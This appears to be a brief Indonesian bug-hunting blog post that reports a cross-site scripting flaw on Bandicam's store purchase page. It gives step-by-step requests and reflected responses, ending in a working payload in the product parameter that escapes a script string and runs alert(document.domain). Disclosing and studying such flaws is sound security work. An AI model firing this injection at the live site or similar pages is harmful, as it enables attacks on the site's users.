Bandicam DOM XSS

Learn System Security - Bandicam DOM XSS ~


Reproduction Steps:
Step #1 Saat membuka halaman halaman https://www.bandicam.com/store/buynow2.php?product=BDCAM kita akan mendapatkan source code seperti:

<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = 'BDCAM-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = '
BDCAM-1';       
        $('#method').val('');       
    }
</script>


Step #2
Request:
ttps://www.bandicam.com/store/buynow2.php?product=test'

Response:
<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = '
test'-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = 'test'-1';       
        $('#method').val('');       
    }
</script>


Step #3
Request:
ttps://www.bandicam.com/store/buynow2.php?product=test');}alert(document.domain);{//

Response:
<script type="text/javascript" >
    //if(document.getElementsByName('PP_BUYEREMAIL1')[0].value == "e.g.) [email protected]")
    {
        //document.getElementsByName('PP_LICENSE')[0].value = '
');}alert(document.domain);{//-1';
        $('#quantity').val('');
        changeLicense();   
        //document.getElementsByName('PP_PAYTYPE')[0].value = '');}alert(document.domain);{//-1';       
        $('#method').val('');       
    }
</script>


Screenshot:

Thank you, happy bug hunting.

0 comments